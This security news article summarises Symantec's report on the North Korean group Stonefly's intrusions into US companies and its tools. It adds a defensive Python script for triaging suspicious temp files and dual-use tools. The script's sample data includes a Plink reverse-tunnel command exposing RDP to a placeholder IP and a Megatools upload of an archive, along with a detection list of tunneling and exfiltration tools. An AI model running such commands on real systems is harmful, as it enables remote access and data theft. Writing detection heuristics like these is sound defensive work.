Symantec reports that the North Korean group it tracks as Stonefly (also known as Andariel, APT45, Silent Chollima, and Onyx Sleet) continues to target organizations in the United States for financial gain, even after members of the group were indicted and a reward was offered for information on them.
In August, a month after the charges were filed, the group compromised three US organizations, Symantec reports. The attackers did not manage to deploy ransomware on any of the victim networks, but the intrusions appear to have been financially motivated: all three victims were private companies engaged in commercial activity, with no obvious intelligence value.
During the attacks, Stonefly used its custom backdoor, Backdoor.Preft (also known as Dtrack and Valefor), which lets the operators download files, execute commands, and load plugins. Symantec also found indicators of compromise previously documented by Microsoft, including a fake Tableau certificate.
Alongside Backdoor.Preft, Stonefly used other tools to keep its foothold on compromised systems. One was the Nukebot backdoor, whose capabilities overlap with those of Backdoor.Preft but which can also capture screenshots; Nukebot's source code has been leaked, which is how the group was able to fold it into its toolkit. The attackers also ran scripts to harvest passwords and used Mimikatz to dump credentials.
Two distinct custom data-collection tools were identified during the attacks:
- The first captured clipboard contents, logged application launches and keystrokes, then encrypted and archived the collected data.
- The second also harvested clipboard contents, writing them to a randomly named .dat file in a temporary directory.
Stonefly also relied on tunneling tools, the SSH clients PuTTY and Plink, the Megatools command-line client for the Mega cloud storage service, and Snap2HTML, a utility that snapshots a directory tree into a searchable HTML file rather than a data visualization tool.
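The behaviours listed above (a randomly named .dat file dropped in a temp directory, and dual-use tools such as Plink, PuTTY, Megatools and Snap2HTML appearing in process command lines) are the kind of thing a hunt team would turn into triage heuristics. The script below is an added example written for this page; it is not Symantec's detection content and not Stonefly's tooling. The entropy threshold, the temp-directory list, the tool names and every sample path and command line are constructed assumptions, and matching on the image name is deliberately simple: an attacker can rename plink.exe, so in practice this would be paired with hash or signer checks.

```python
"""Triage heuristics for the Stonefly tradecraft described in the article.

Added illustration only; thresholds, directory lists and sample records are
constructed assumptions, not indicators from Symantec's report.
"""
import math
import re
from collections import Counter
from typing import List, Optional, Tuple

# Directories (lower-case, forward-slash normalised) treated as "temporary".
TEMP_DIRS = ("/appdata/local/temp", "/windows/temp", "/tmp", "/var/tmp")

# Dual-use tools named in the article, matched on the process image name.
DUAL_USE_TOOLS = ("plink", "putty", "megatools", "snap2html")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_random(stem: str, min_len: int = 8, min_entropy: float = 3.0) -> bool:
    """Heuristic: a long, purely alphanumeric, high-entropy name with no
    separators reads as machine-generated rather than human-chosen."""
    if len(stem) < min_len or not re.fullmatch(r"[A-Za-z0-9]+", stem):
        return False
    return shannon_entropy(stem.lower()) >= min_entropy


def suspicious_dat_file(path: str) -> bool:
    """True for a randomly named .dat file located under a temp directory."""
    norm = path.replace("\\", "/").lower()
    dirname, _, name = norm.rpartition("/")
    if not name.endswith(".dat"):
        return False
    if not any(t in dirname for t in TEMP_DIRS):
        return False
    return looks_random(name[:-len(".dat")])


def dual_use_tool(cmdline: str) -> Optional[str]:
    """Return the matching dual-use tool name if the process image is one."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    if not m:
        return None
    image = (m.group(1) or m.group(2)).replace("\\", "/")
    base = image.rsplit("/", 1)[-1].lower()
    if base.endswith(".exe"):
        base = base[:-4]
    for tool in DUAL_USE_TOOLS:
        if tool in base:
            return tool
    return None


def triage(files: List[str], cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Run both heuristics and return (finding, evidence) pairs."""
    findings: List[Tuple[str, str]] = []
    for p in files:
        if suspicious_dat_file(p):
            findings.append(("random_dat_in_temp", p))
    for c in cmdlines:
        tool = dual_use_tool(c)
        if tool:
            findings.append(("dual_use_tool:" + tool, c))
    return findings


# Constructed sample records (not real telemetry). 203.0.113.0/24 is the
# RFC 5737 documentation range, used here to avoid naming a real host.
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Local\Temp\k8f2nq7zxw1p.dat",   # random name, temp
    r"C:\Users\alice\AppData\Local\Temp\settings.dat",       # ordinary name
    r"C:\Program Files\Vendor\data\a1b2c3d4e5f6.dat",        # random, not temp
]
SAMPLE_CMDLINES = [
    r'"C:\Users\alice\Downloads\plink.exe" -ssh -P 443 -R 3389:127.0.0.1:3389 user@203.0.113.10',
    r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt",
    r"megatools put --username svc@example.invalid C:\Users\alice\AppData\Local\Temp\archive.7z",
]

if __name__ == "__main__":
    for finding, evidence in triage(SAMPLE_FILES, SAMPLE_CMDLINES):
        print(f"{finding:28} {evidence}")
```

Run against the constructed sample, the script flags the random .dat file in the temp directory, the Plink reverse-tunnel command line and the Megatools upload, and ignores the ordinary settings.dat, the random-looking file outside a temp directory, and notepad. The entropy threshold of 3.0 bits means an eight-character name must have all-distinct characters to qualify, so tune it against your own baseline of benign temp files before alerting on it.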